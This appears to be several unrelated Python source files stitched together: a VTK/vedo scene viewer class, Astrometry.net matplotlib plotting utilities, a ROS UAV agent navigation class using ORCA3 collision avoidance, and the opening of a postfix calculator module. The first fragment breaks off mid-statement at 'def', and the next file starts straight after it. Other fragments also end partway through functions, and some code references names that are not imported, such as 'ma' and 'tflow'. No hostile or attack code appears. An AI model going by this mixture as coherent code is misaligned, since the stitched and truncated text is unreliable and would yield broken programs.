self.update_element_color(self.color_bar) if not update_ui: return if self.model.ui.embed: all_elements = self.model.ui.all_elements() for key in all_elements: element = all_elements[key] self.update_element_color(element) def set_renderer(self): """ Set VTK renderer, attempts to use OSPRay, if available OSPRay is not supported (2021) by default and there is no pip wheel for it with vtk, or paraview or any vtk-based tool. So you can only rely on OSPRay if you compile it alongside VTK. """ renderer = self.plot.renderer try: ospray_pass= vtk.vtkOSPRayPass() renderer.SetPass(ospray_pass) node = vtk.vtkOSPRayRendererNode() node.SetSamplesPerPixel(4,renderer) node.SetAmbientSamples(4,renderer) node.SetMaxFrames(4, renderer) except (AttributeError, ImportError, NameError): pass # For some reason, depth peeling is sometimes not activated # so it's further made active in volume.SlicerView.initialize_mapper() # If you don't know about depth peeling: https://vtk.org/Wiki/VTK/Depth_Peeling for renderer in self.plot.renderers: renderer.UseDepthPeelingForVolumesOn() renderer.SetOcclusionRatio(0.001) renderer.SetMaximumNumberOfPeels(100) def register_object(self, vtk_object, name=None, selectable=True): """ Register an object as selectable by the user in the UI :param vtk_object: VTK object :param name: Name or given id. 
IF None, the name of the object is used """ if name is None: name = vtk_object.name existing_obj = self.objects.get(name) if existing_obj != vtk_object and name in self.objects: # Then we have two same names for two different objects # let's change that name = self.get_unique_object_name(name) self.objects[name] = vtk_object if selectable: vtk_object.SetPickable(True) # We overwrite the vtk object's name with the new one vtk_object.name = name self.update_selection_slider() self.objects_changed() def get_unique_object_name(self, name, spacer='_'): """ Get a unique key/name for selectable objects with similar names :param name: Name (for instance 'Points') :param spacer: Spacer char :return: New name, for instance 'Points_4' """ return utils.get_unique_name(self.objects, name, spacer) def unregister_object(self, name): """ Unregister an object from the selectable objects list :param name: Object name or given id or int or the object itself """ if isinstance(name, int): keys = list(self.objects.keys()) try: name = keys[name] except Exception: pass elif not isinstance(name, str): for key in self.objects: if name == self.objects[key]: name = key break del self.objects[name] self.update_selection_slider() def update_selection_slider(self, max_value=None): """ Update the selection slider max value :param max_value: Max value. 
If None, the maximum value is the length of the self.objects """ if max_value is None: max_value = len(self.objects)-1 slider = self.widgets.get('selection') if slider is not None: slider.GetRepresentation().SetMinimumValue(0) slider.GetRepresentation().SetMaximumValue(max_value) def register_controller(self, controller, vtk_objects): """ Register/map VTK objects to a view :param controller: A controller instance (like VolumeController) :param vtk_objects: All objects directly related to this view """ self.register_object(controller.actor) if not isinstance(vtk_objects, list): vtk_objects = [vtk_objects] for obj in vtk_objects: self.controllers_map[obj] = controller def get_view_objects(self): """ Get all view objects registered in this model :return: List """ return list(self.controllers_map.keys()) def get_view_objects_names(self): """ Get view objects names :return: Dict """ names = {} for obj in self.controllers_map: names[obj.name] = obj return names def get_window(self): """ Get the plot window object. This is useful for displaying this window in Jupyter notebooks for instance :return: iren window object """ return self.plot.window def render(self, save_to_file=None, width=None, height=None, scale=1): """ Render the current state of the viewer, optionally to a file. Supported formats are jpg, png, pdf, svg, eps :param save_to_file: File path :param width: Width of the rendered image :param height: Height of the rendered image :param scale: Rendering scale factor. Defaults to 1 """ self.plot.render() if save_to_file is not None: custom_size = isinstance(width, int) and isinstance(height, int) if custom_size: current_width, current_height = self.plot.window.GetSize() # Set the desired size self.plot.window.SetSize(width, height) self.plot.show() if scale > 1: # Apparently it's better to enable the setting below when we use # scaling for larger size rendering. # There's a typo in the variable name and even the variable name # is inappropriate. 
This isn't a screenshot but a render. (@marcomusy) # So I put that in a try catch just in case it changes in the future... try: vedo.settings.screeshotLargeImage = True except Exception: pass vedo.screenshot(save_to_file, scale) if custom_size: # Now reset the size as it was self.plot.window.SetSize(current_width, current_height) self.plot.show() def show(self, interactive=True, actors=None, at=0, **kwargs): """ Render the plot and let the user interact with it :param interactive: Whether we render and make the window interactive :param actors: List of actors to show. Use this parameter only if you know what you're doing. :param at: Which VTK window to use. Defaults to 0 """ if actors is not None: actors_to_show = actors else: actors_to_show = self.plot.actors if self.model.selection is None: self.select(-1) #self.view_selected() if not interactive: self.plot.render() if self.model.web_ui: logging.info(f'\nVisualizer started in Web UI mode: ' + str(utils.time_diff(self.model.runtime)) + 's\n') return self.plot.show(actors_to_show, at=at, resetcam=False, interactive=interactive, **kwargs) #return ViewInteractiveWidget(self.plot.window) else: logging.info('\nVisualizer started: ' + str(utils.time_diff(self.model.runtime)) + 's\n') #self.plot.window.SetWindowName() return self.plot.show(actors_to_show, at=at, resetcam=False, interactive=interactive, **kwargs) def close(self): """ Close the current plot """ self.plot.close() def add_callback(self, event_name, func, priority=0.0): """ Add an event listener (aka callback method) :param event_name: A VTK event name :param func: Listener function :param priority: Priority in event queue :return: Callback id """ return utils.add_callback(self.plot, event_name, func, priority) def remove_callback(self, callback_id): """ Add an event listener (aka callback method) :param callback_id_or_event_name: A VTK event name """ self.plot.interactor.RemoveObserver(callback_id) def handle_timer(self, iren, event, **kwargs): """ Handle 
vtk timer event :param iren: Render window :param event: TimerEvent """ if self.model.animation_playing: valid = self.next_time_series() if not valid: self.plot.interactor.DestroyTimer(self.model.timer_id) def
# This file is part of the Astrometry.net suite. # Licensed under a 3-clause BSD style license - see LICENSE from __future__ import print_function import matplotlib.cm import matplotlib.colors import matplotlib.patches import numpy as np import pylab as plt from matplotlib.ticker import FixedFormatter import functools class NanColormap(matplotlib.colors.Colormap): ''' A Colormap that wraps another colormap, but replaces non-finite values with a fixed color. ''' def __init__(self, cmap, nancolor): self.cmap = cmap self.nanrgba = matplotlib.colors.colorConverter.to_rgba(nancolor) def __call__(self, data, **kwargs): rgba = self.cmap(data, **kwargs) # 'data' is a MaskedArray, apparently... if np.all(data.mask == False): return rgba iy,ix = np.nonzero(data.mask) #print 'NanColormap: replacing', len(iy), 'pixels with', self.nanrgba # nanrgba are floats in [0,1]; convert to uint8 in [0,255]. rgba[iy,ix, :] = np.clip(255. * np.array(self.nanrgba), 0, 255).astype(np.uint8) return rgba def __getattr__(self, name): ''' delegate to underlying colormap. ''' return getattr(self.cmap, name) def _imshow_better_defaults(imshowfunc, X, interpolation='nearest', origin='lower', cmap='gray', ticks=True, **kwargs): ''' An "imshow" wrapper that uses more sensible defaults. ''' X = imshowfunc(X, interpolation=interpolation, origin=origin, cmap=cmap, **kwargs) if not ticks: plt.xticks([]); plt.yticks([]) return X def _imshow_nan(imshowfunc, X, nancolor='0.5', cmap=None, vmin=None, vmax=None, **kwargs): ''' An "imshow" work-alike that replaces non-finite values by a fixed color. ''' if np.all(np.isfinite(X)): return imshowfunc(X, cmap=cmap, vmin=vmin, vmax=vmax, **kwargs) # X has non-finite values. Time to get tricky. cmap = matplotlib.cm.get_cmap(cmap) cmap = NanColormap(cmap, nancolor) if vmin is None or vmax is None: I = np.flatnonzero(np.isfinite(X)) if vmin is None: try: vmin = X.flat[I].min() except ValueError: vmin = 0. 
if vmax is None: try: vmax = X.flat[I].max() except ValueError: vmax = 0. return imshowfunc(X, cmap=cmap, vmin=vmin, vmax=vmax, **kwargs) ''' A plt.imshow() work-alike, except with defaults: interpolation='nearest', origin='lower'. ''' imshow_better_defaults = functools.partial(_imshow_better_defaults, plt.imshow) ''' A plt.imshow() work-alike, except handles non-finite values. Accepts an additional kwarg: nancolor='0.5' ''' imshow_nan = functools.partial(_imshow_nan, plt.imshow) ''' My version of plt.imshow that uses imshow_better_defaults and imshow_nan. ''' dimshow = functools.partial(_imshow_better_defaults, imshow_nan) def replace_matplotlib_functions(): ''' Replaces plt.imshow with a function that handles non-finite values and has the defaults interpolation='nearest', origin='lower'. ''' plt.imshow = dimshow class PlotSequence(object): def __init__(self, basefn, format='%02i', suffix='png', suffixes=None): self.ploti = 0 self.basefn = basefn self.format = format if suffixes is None: self.suffixes = [suffix] else: self.suffixes = suffixes self.pattern = self.basefn + '-%s.%s' self.printfn = True def skip(self, n=1): self.ploti += n def skipto(self, n): self.ploti = n def getnextlist(self): #lst = ['%s-%s.%s' % (self.basefn, self.format % self.ploti, suff) lst = [self.pattern % (self.format % self.ploti, suff) for suff in self.suffixes] self.ploti += 1 return lst def getnext(self): lst = self.getnextlist() if len(lst) == 1: return lst[0] return lst def savefig(self, **kwargs): import pylab as plt for fn in self.getnextlist(): plt.savefig(fn, **kwargs) if self.printfn: print('saved', fn) def loghist(x, y, nbins=100, hot=True, doclf=True, docolorbar=True, lo=0.3, imshowargs={}, clampxlo=False, clampxlo_val=None, clampxlo_to=None, clampxhi=False, clampxhi_val=None, clampxhi_to=None, clampylo=False, clampylo_val=None, clampylo_to=None, clampyhi=False, clampyhi_val=None, clampyhi_to=None, clamp=None, clamp_to=None, **kwargs): #np.seterr(all='warn') if doclf: 
plt.clf() myargs = kwargs.copy() if not 'bins' in myargs: myargs['bins'] = nbins rng = kwargs.get('range', None) x = np.array(x) y = np.array(y) if not (np.all(np.isfinite(x)) and np.all(np.isfinite(y))): K = np.flatnonzero(np.isfinite(x) * np.isfinite(y)) print('loghist: cutting to', len(K), 'of', len(x), 'finite values') x = x[K] y = y[K] if clamp is True: clamp = rng if clamp is not None: ((clampxlo_val, clampxhi_val),(clampylo_val, clampyhi_val)) = clamp if clamp_to is not None: ((clampxlo_to, clampxhi_to),(clampylo_to, clampyhi_to)) = clamp_to if clampxlo: if clampxlo_val is None: if rng is None: raise RuntimeError('clampxlo, but no clampxlo_val or range') clampxlo_val = rng[0][0] if clampxlo_val is not None: if clampxlo_to is None: clampxlo_to = clampxlo_val x[x < clampxlo_val] = clampxlo_to if clampxhi: if clampxhi_val is None: if rng is None: raise RuntimeError('clampxhi, but no clampxhi_val or range') clampxhi_val = rng[0][1] if clampxhi_val is not None: if clampxhi_to is None: clampxhi_to = clampxhi_val x[x > clampxhi_val] = clampxhi_to if clampylo: if clampylo_val is None: if rng is None: raise RuntimeError('clampylo, but no clampylo_val or range') clampylo_val = rng[1][0] if clampylo_val is not None: if clampylo_to is None: clampylo_to = clampylo_val y[y < clampylo_val] = clampylo_to if clampyhi: if clampyhi_val is None: if rng is None: raise RuntimeError('clampyhi, but no clampyhi_val or range') clampyhi_val = rng[1][1] if clampyhi_val is not None: if clampyhi_to is None: clampyhi_to = clampyhi_val y[y > clampyhi_val] = clampyhi_to (H,xe,ye) = np.histogram2d(x, y, **myargs) L = np.log10(np.maximum(lo, H.T)) myargs = dict(extent=(min(xe), max(xe), min(ye), max(ye)), aspect='auto', interpolation='nearest', origin='lower') myargs.update(imshowargs) plt.imshow(L, **myargs) if hot: plt.hot() if docolorbar: r = [np.log10(lo)] + list(range(int(np.ceil(L.max())))) # print 'loghist: L max', L.max(), 'r', r plt.colorbar(ticks=r, format=FixedFormatter( ['0'] + 
['%i'%(10**ri) for ri in r[1:]])) #set_fp_err() return H, xe, ye def plothist(x, y, nbins=100, log=False, doclf=True, docolorbar=True, dohot=True, plo=None, phi=None, scale=None, imshowargs={}, **hist2dargs): if log: return loghist(x, y, nbins=nbins, doclf=doclf, docolorbar=docolorbar, dohot=dohot, imshowargs=imshowargs) #, **kwargs) if doclf: plt.clf() (H,xe,ye) = np.histogram2d(x, y, nbins, **hist2dargs) if scale is not None: H *= scale myargs = dict(extent=(min(xe), max(xe), min(ye), max(ye)), aspect='auto', interpolation='nearest', origin='lower') vmin = None if plo is not None: vmin = np.percentile(H.ravel(), plo) myargs.update(vmin=vmin) if phi is not None: vmin = imshowargs.get('vmin', vmin) vmax = np.percentile(H.ravel(), phi) if vmax != vmin: myargs.update(vmax=vmax) myargs.update(imshowargs) plt.imshow(H.T, **myargs) if dohot: plt.hot() if docolorbar: plt.colorbar() return H, xe, ye def setRadecAxes(ramin, ramax, decmin, decmax): rl,rh = ramin,ramax dl,dh = decmin,decmax rascale = np.cos(np.deg2rad((dl+dh)/2.)) ax = [rh,rl, dl,dh] plt.axis(ax) plt.gca().set_aspect(1./rascale, adjustable='box', anchor='C') plt.xlabel('RA (deg)') plt.ylabel('Dec (deg)') return ax import matplotlib.colors as mc class ArcsinhNormalize(mc.Normalize): def __init__(self, mean=None, std=None, **kwargs): self.mean = mean self.std = std mc.Normalize.__init__(self, **kwargs) def _map(self, X, out=None): Y = (X - self.mean) / self.std args = (Y,) if out is not None: args = args + (out,) return np.arcsinh(*args) def __call__(self, value, clip=None): # copied from Normalize since it's not easy to subclass if clip is None: clip = self.clip result, is_scalar = self.process_value(value) self.autoscale_None(result) vmin, vmax = self.vmin, self.vmax if vmin > vmax: raise ValueError("minvalue must be less than or equal to maxvalue") elif vmin == vmax: result.fill(0) # Or should it be all masked? Or 0.5? 
else: vmin = float(vmin) vmax = float(vmax) if clip: mask = ma.getmask(result) result = ma.array(np.clip(result.filled(vmax), vmin, vmax), mask=mask) # ma division is very slow; we can take a shortcut resdat = result.data self._map(resdat, resdat) vmin = self._map(vmin) vmax = self._map(vmax) resdat -= vmin resdat /= (vmax - vmin) result = np.ma.array(resdat, mask=result.mask, copy=False) if is_scalar: result = result[0] return result from matplotlib.colors import LinearSegmentedColormap # a colormap that goes from white to black: the opposite of matplotlib.gray() antigray = LinearSegmentedColormap('antigray', {'red': ((0., 1, 1), (1., 0, 0)), 'green': ((0., 1, 1), (1., 0, 0)), 'blue': ((0., 1, 1), (1., 0, 0))}) bluegrayred = LinearSegmentedColormap('bluegrayred', {'red': ((0., -1, 0), (1., 1, -1)), 'green': ((0., -1, 0), (0.5,0.5, 0.5), (1., 0, -1)), 'blue': ((0., -1, 1), (1., 0, -1))}) # x, y0, y1 _redgreen_data = {'red': ((0., -100, 1), #(0.5, 0, 0), #(0.5, 0.1, 0), (0.49, 0.1, 0), (0.491, 0, 0), (0.51, 0, 0), (0.511, 0, 0.1), (1., 0, -100)), 'green': ((0., -100, 0), #(0.5, 0, 0), #(0.5, 0, 0.1), (0.49, 0.1, 0), (0.491, 0, 0), (0.51, 0, 0), (0.511, 0, 0.1), (1., 1, -100)), 'blue': ((0., -100, 0), (1., 0, -100))} redgreen = LinearSegmentedColormap('redgreen', _redgreen_data) def hist_ints(x, step=1, **kwargs): ''' Creates a histogram of integers. The number of bins is set to the range of the data (+1). That is, each integer gets its own bin. ''' kwargs['bins'] = x.max()/step - x.min()/step + 1 kwargs['range'] = ( (x.min()/int(step))*step - 0.5, ((x.max()/int(step))*step + 0.5) ) return plt.hist(x, **kwargs) def hist2d_with_outliers(x, y, xbins, ybins, nout): ''' Creates a 2D histogram from the given data, and returns a list of the indices in the data of points that lie in low-occupancy cells (where the histogram counts is < "nout"). The "xbins" and "ybins" arguments are passed to numpy.histogram2d. 
You probably want to show the histogram with: (H, outliers, xe, ye) = hist2d_with_outliers(x, y, 10, 10, 10) imshow(H, extent=(min(xe), max(xe), min(ye), max(ye)), aspect='auto') plot(x[outliers], y[outliers], 'r.') Returns: (H, outliers, xe, ye) H: 2D histogram image outliers: array of integer indices of the outliers xe: x edges chosen by histgram2d ye: y edges chosen by histgram2d ''' # returns (density image, indices of outliers) (H,xe,ye) = plt.histogram2d(x, y, (xbins,ybins))
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------------------------------------------------
# ROS-MAGNA
# ----------------------------------------------------------------------------------------------------------------------
# The MIT License (MIT)
# Copyright (c) 2016 GRVC University of Seville
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
# Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# ---------------------------------------------------------------------------------------------------------------------- """ Created on Mon Feb 21 2018 @author: josmilrom """ import sys import rospy import std_msgs.msg import time import math import numpy as np import tf # import rvo2 import rvo23d import time # from cv_bridge import CvBridge, CvBridgeError from uav_abstraction_layer.srv import * from geometry_msgs.msg import * from sensor_msgs.msg import * # import tensorflow as tflow # from tensorflow.python.tools import inspesct_checkpoint as chkp class Agent_NAI(object): def __init__(self,ID): # Local parameters inizialization from arguments self.ID = ID self.smooth_path_mode = 0 self.algorithms_dicc = {} self.GettingWorldDefinition() # Global ROS parameters inizialization # self.timer_start = time.time() # Function to decide which algorithm is used for new velocity depending on parameters def Guidance(self,desired_speed): self.NeighborSelector(int(self.algorithms_dicc["orca3"]["N_neighbors_aware"])+1) self.desired_speed = desired_speed # print "loop time", time.time() - self.timer_start # self.timer_start = time.time() if "simple" in self.algorithms_dicc.keys(): return self.SimpleGuidance() if "neural_network" in self.algorithms_dicc.keys(): return self.NeuralNetwork() # elif self.algorithms_dicc[0] == "orca": # return self.ORCA() if "orca3" in self.algorithms_dicc.keys(): return self.ORCA3() # return self.ORCA3_from_node() # Function to set new velocity using a Neural Network def NeuralNetwork(self): # If the solver is a neural network, make some additional initializations if not hasattr(self,'nn_loaded'): self.nn_loaded = True self.session = tflow.Session() # Start a TensorFlow session self.learning_dataset_def = {"teacher_role" : self.role, "teacher_algorithm" : "orca3", "N_neighbors_aware" : self.algorithms_dicc["neural_network"]["N_neighbors_aware"]} gml_folder_path = "/home/{0}/Libraries/gml".format("joseandresmr") self.session_path = gml_folder_path + 
"/Sessions/{0}/{1}/{2}".format(self.learning_dataset_def["teacher_role"],self.learning_dataset_def["teacher_algorithm"],self.learning_dataset_def["N_neighbors_aware"]) # Import the metagraph from specific path. In the future will be better path management new_saver = tflow.train.import_meta_graph(self.session_path + "/model.meta") # Restore to the last chechpoint new_saver.restore(self.session,tflow.train.latest_checkpoint(self.session_path)) # Initialize inputs and outputs from graph self.graph_inputs = tflow.get_default_graph().get_tensor_by_name("single_input:0") self.graph_outputs = tflow.get_default_graph().get_tensor_by_name("vel_posttreated:0") # self.single_vel_logits_tensor = tflow.get_default_graph().get_tensor_by_name("single_vel_logits:0") # Definition of neural network's inputs and outputs for every role. # In the future this will be imported from a common place if self.role == "path": input_dicc = ['own_vel','goal_pose_rel','others_pos_rel','others_vel'] output_dicc = ["sel_vel"] elif self.role == "agent_ad": input_dicc = ['own_vel','goal_pose_rel','goal_vel','distance','others_pos_rel','others_vel'] output_dicc = ["sel_vel"] elif self.role == "agent_ap": input_dicc = ['own_vel','goal_pose_rel','goal_vel','others_pos_rel','others_vel'] output_dicc = ["sel_vel"] # Initialization of pos and vel that will be taken as inputs inputs = [] main_agent_pos = self.agents_data_list[self.ID-1].position.pose main_agent_vel = self.agents_data_list[self.ID-1].velocity.twist.linear # For every input in the dictionary, crate if needed and add it to inputs for n_input in input_dicc: # own vel if n_input == "own_vel": inputs += [main_agent_vel.x,main_agent_vel.y,main_agent_vel.z] # own goal elif n_input == "goal_pose_rel": goal_lin_rel = self.OperatePoses(self.goal["pose"],main_agent_pos,'-').position inputs += [goal_lin_rel.x,goal_lin_rel.y,goal_lin_rel.z] elif n_input == "goal_vel": inputs += 
[self.goal["vel"].linear.x,self.goal["vel"].linear.y,self.goal["vel"].linear.z] elif n_input == "distance": inputs.append(self.goal["dist"]) elif n_input == "others_pos_rel": for n_neighbor in range(self.algorithms_dicc["neural_network"]["N_neighbors_aware"]): if self.near_neighbors_sorted["types"][n_neighbor] == "agent": n_agent = self.near_neighbors_sorted["ids"][n_neighbor] other_pos_rel = self.OperatePoses(self.agents_data_list[n_agent].position.pose,main_agent_pos,'-').position inputs += [other_pos_rel.x,other_pos_rel.y,other_pos_rel.z] elif self.near_neighbors_sorted["types"][n_neighbor] == "obs": n_obs = self.near_neighbors_sorted["ids"][n_neighbor] obs_pose = self.obs_pose_list[n_obs] other_pos_rel = self.OperatePoses(self.PoseFromArray(obs_pose),main_agent_pos,'-').position inputs += [other_pos_rel.x,other_pos_rel.y,other_pos_rel.z] elif n_input == "others_vel": for n_neighbor in range(self.algorithms_dicc["neural_network"]["N_neighbors_aware"]): if self.near_neighbors_sorted["types"][n_neighbor] == "agent": n_agent = self.near_neighbors_sorted["ids"][n_neighbor] other_vel_lin = self.agents_data_list[n_agent].velocity.twist.linear inputs += [other_vel_lin.x,other_vel_lin.y,other_vel_lin.z] elif self.near_neighbors_sorted["types"][n_neighbor] == "obs": inputs += [0,0,0] # Reshape the inputs to a single row inputs_trans = np.asarray(inputs) inputs_trans = inputs_trans.reshape((1, inputs_trans.shape[0])) # Run session once to predict new selected velocity selected_velocity = self.session.run(self.graph_outputs, feed_dict={self.graph_inputs:inputs_trans}) # Depict the output into the defined variables output_index = 0 for n_output in output_dicc: if n_output == "sel_vel": selected_velocity = selected_velocity[0][output_index:output_index+3] # Construct the twist new_velocity_twist = Twist(Vector3(selected_velocity[0],selected_velocity[1],selected_velocity[2]),Vector3(0,0,0)) output_index += 3 # print("nn",new_velocity_twist) # self.ORCA3() 
print(new_velocity_twist) return new_velocity_twist # Function to set velocity using ORCA on 3D def ORCA3(self): self.algorithms_dicc["orca3"]["N_neighbors_aware"] = int(self.algorithms_dicc["orca3"]["N_neighbors_aware"]) params_dicc = self.algorithms_dicc["orca3"] # Give value to orca algorithm parameters timeStep = params_dicc["timeStep"] # 1/60. float The time step of the simulation. Must be positive. neighborDist = params_dicc["neighborDist"] # 1.5 float The maximal distance (center point to center point) to other agents the agent takes into account in the navigation maxNeighbors = params_dicc["N_neighbors_aware"] # 5 size_t The maximal number of other agents the agent takes into account in the navigation timeHorizon = params_dicc["timeHorizon"] # 2.5 float The minimal amount of time for which the agent's velocities that are computed by the simulation are safe with respect to other agents. agent_radius = params_dicc["agent_radius"] # 2 float The radius of the agent. Must be non-negative maxSpeed = params_dicc["maxSpeed"] # 0.4 float The maximum speed of the agent. Must be non-negative. 
velocity = (1, 1, 1) obs_radius = 0.5 # Create an object of orca3 solver class and give the above defined parameters sim = rvo23d.PyRVOSimulator(params_dicc["timeStep"], params_dicc["neighborDist"], params_dicc["N_neighbors_aware"], params_dicc["timeHorizon"], params_dicc["agent_radius"], params_dicc["maxSpeed"], velocity) # Select nearest Agents and Neighbors orca_agent_list = [] prefered_velocity = self.SimpleGuidance() # Select a velocity directly to goal as if there weren't exist neighbors # Add to orca3 and to own list every agent created by own params position_array = self.ArrayFromPose(self.agents_data_list[self.ID-1].position.pose)[0] velocity_array = self.ArrayFromTwist(self.agents_data_list[self.ID-1].velocity.twist)[0] prefered_velocity_array = self.ArrayFromTwist(prefered_velocity)[0] orca_agent_list = [sim.addAgent((position_array[0],position_array[1],position_array[2]), params_dicc["neighborDist"], params_dicc["N_neighbors_aware"], params_dicc["timeHorizon"], params_dicc["agent_radius"], params_dicc["maxSpeed"], (velocity_array[0],velocity_array[1],velocity_array[2]))] # Set the prefered velocity of own Agent as decided avobe sim.setAgentPrefVelocity(orca_agent_list[0],(prefered_velocity_array[0],prefered_velocity_array[1],prefered_velocity_array[2])) for n_neighbor in range(len(self.near_neighbors_sorted["ids"])): if self.near_neighbors_sorted["types"][n_neighbor] == "agent": n_agent = self.near_neighbors_sorted["ids"][n_neighbor] position_array = self.ArrayFromPose(self.agents_data_list[n_agent].position.pose)[0] velocity_array = self.ArrayFromTwist(self.agents_data_list[n_agent].velocity.twist)[0] orca_agent_list.append(sim.addAgent((position_array[0],position_array[1],position_array[2]), params_dicc["neighborDist"], params_dicc["N_neighbors_aware"], params_dicc["timeHorizon"], params_dicc["agent_radius"], params_dicc["maxSpeed"], (velocity_array[0],velocity_array[1],velocity_array[2]))) 
sim.setAgentPrefVelocity(orca_agent_list[-1],(velocity_array[0],velocity_array[1],velocity_array[2])) # Add to orca3 and to own list every obstacle created by own params elif self.near_neighbors_sorted["types"][n_neighbor] == "obs": n_obs = self.near_neighbors_sorted["ids"][n_neighbor] obs_pose = self.obs_pose_list[n_obs] orca_agent_list.append(sim.addAgent((obs_pose[0][0],obs_pose[0][1],obs_pose[0][2]), params_dicc["neighborDist"], params_dicc["N_neighbors_aware"], params_dicc["timeHorizon"], obs_radius, 0.0, (0, 0, 0))) sim.setAgentPrefVelocity(orca_agent_list[-1],(0,0,0)) sim.doStep() # Perform a step of orca3 selected_velocity = sim.getAgentVelocity(orca_agent_list[0]) # Extract own velocity decided by orca3 # Become that velocity in a twist new_velocity_twist = Twist(Vector3(0,0,0),Vector3(0,0,0)) new_velocity_twist.linear.x = selected_velocity[0] new_velocity_twist.linear.y = selected_velocity[1] new_velocity_twist.linear.z = selected_velocity[2] # If head use selected, decide it by direct by simple algorithm. In future, put lower threshold. 
if self.heading_use == True: new_velocity_twist.angular.z = prefered_velocity.angular.z return new_velocity_twist def ORCA3_from_node(self): if "agent_created" not in self.algorithms_dicc["orca3"].keys(): # rospy.wait_for_service('orca/add_agents') # try: # add_agent_prox = rospy.ServiceProxy('orca/add_agents', MESSAGEEEEEEEEEEEEEE ) # # model_name = "{0}_{1}".format(self.agent_models[n_agent],n_agent+1) # add_agent_prox(model_name) # time.sleep(0.1) # except rospy.ServiceException, e: # print "Service call failed: %s"%e # print "error in add orca agent" self.orca_optimal_velocity = Twist() self.algorithms_dicc["orca3"]["agent_created"] = True self.algorithms_dicc["orca3"]["prefered_velocity_pub"] = rospy.Publisher('/orca/agent_{}/prefered_velocity'.format(self.ID), TwistStamped, queue_size = 1) def handle_orca_optimal_velocity(data): self.orca_optimal_velocity = data.twist rospy.Subscriber('/orca/agent_{}/optimal_velocity'.format(self.ID), TwistStamped, handle_orca_optimal_velocity) prefered_velocity = self.SimpleGuidance() prefered_velocity_stamped = TwistStamped() prefered_velocity_stamped.twist = prefered_velocity self.algorithms_dicc["orca3"]["prefered_velocity_pub"].publish(prefered_velocity_stamped) time.sleep(0.1) return self.orca_optimal_velocity # Function to set velocity directly to goal def SimpleGuidance(self): if self.smooth_path_mode != 0: return self.agents_data_list[self.ID-1].smooth_velocity # Set algorithm params desired_speed_at_goal = 0 aprox_distance = 3 # Create a vector from actual position to goal position relative_distance = np.asarray([self.goal["pose"].position.x-self.agents_data_list[self.ID-1].position.pose.position.x,\ self.goal["pose"].position.y-self.agents_data_list[self.ID-1].position.pose.position.y,\ self.goal["pose"].position.z-self.agents_data_list[self.ID-1].position.pose.position.z]) distance_norm = np.linalg.norm(relative_distance) # Calculate its norm # If at the distance shorter than aproximation distance, reduce the 
velocity module if distance_norm < aprox_distance: self.desired_speed = desired_speed_at_goal - (self.desired_speed - desired_speed_at_goal)\ + ((self.desired_speed - desired_speed_at_goal) *2) / (1 + math.exp(-5*distance_norm/aprox_distance)) # Multiply each axis by the velocity module relative_WP_linear=Vector3(relative_distance[0]/distance_norm*self.desired_speed,\ relative_distance[1]/distance_norm*self.desired_speed,\ relative_distance[2]/distance_norm*self.desired_speed) # Transform it in a pose position and calculate its orientation in Euler angles relative_WP_pose_degrees=Pose(relative_WP_linear,\ Vector3(np.arctan2(relative_WP_linear.z,relative_WP_linear.y),\ np.arctan2(relative_WP_linear.x,relative_WP_linear.z),\ np.arctan2(relative_WP_linear.y,relative_WP_linear.x))) #### COMPROBAR ANGULOS # Transform the orientation from Eurler angles to quaternions orientation_list = [self.agents_data_list[self.ID-1].position.pose.orientation.x, self.agents_data_list[self.ID-1].position.pose.orientation.y, self.agents_data_list[self.ID-1].position.pose.orientation.z, self.agents_data_list[self.ID-1].position.pose.orientation.w] euler = tf.transformations.euler_from_quaternion(orientation_list) # Create the velocity twist with calculated data new_velocity_twist = Twist(relative_WP_pose_degrees.position,\ Vector3(0,\ 0,\ relative_WP_pose_degrees.orientation.z-euler[2])) # Thresholds imposition # new_velocity_twist.linear.x = self.UpperLowerSaturation(new_velocity_twist.linear.x,1.5) # new_velocity_twist.linear.y = self.UpperLowerSaturation(new_velocity_twist.linear.y,1.5)
"""Module containing class `Calculator`."""

import math
import operator


class CalculatorError(Exception):
    """Raised for all user-visible calculator failures."""
    pass


class Calculator:
    """
    Postfix calculator.

    An instance of this class evaluates postfix expressions, with a
    focus on arithmetic and boolean logic. The syntax and semantics of
    the calculator are similar but not identical to those of a small
    subset of the PostScript programming language.
    """

    def __init__(self):
        self._dict_stack = _DictionaryStack()
        self._operand_stack = _OperandStack()

    @property
    def dict_stack(self):
        return self._dict_stack

    @property
    def operand_stack(self):
        return self._operand_stack

    def clear(self):
        """Reset both the dictionary stack and the operand stack."""
        self._dict_stack.clear()
        self._operand_stack.clear()

    def execute(self, code):
        """Execute the whitespace-separated tokens of `code`.

        Each token is interpreted, in order, as an integer literal, a
        float literal, or a name looked up on the dictionary stack.
        Operator objects execute immediately; every other value is
        pushed onto the operand stack.

        Raises:
            CalculatorError: if a token is neither a literal nor a known
                name, or if an operator's execution fails.
        """
        tokens = code.split()
        for token in tokens:

            # integer literal
            try:
                obj = int(token)
            except ValueError:
                pass
            else:
                self._operand_stack.push(obj)
                continue

            # float literal
            try:
                obj = float(token)
            except ValueError:
                pass
            else:
                self._operand_stack.push(obj)
                continue

            # Name lookup. `_DictionaryStack.get` raises CalculatorError
            # itself (with the same 'Unrecognized name' message) for
            # unknown names — it never raises KeyError, so the former
            # `except KeyError` translation here was dead code and has
            # been removed. Behavior is unchanged.
            obj = self._dict_stack.get(token)
            if isinstance(obj, _Operator):
                obj.execute(self)
            else:
                self._operand_stack.push(obj)


class _DictionaryStack:
    """Two-level name lookup: user definitions shadow system ones."""

    def __init__(self):
        self._system_dict = _SYSTEM_DICT
        self.clear()

    def clear(self):
        # Only user definitions are cleared; the system dictionary is
        # module-level and shared by all calculators.
        self._user_dict = {}

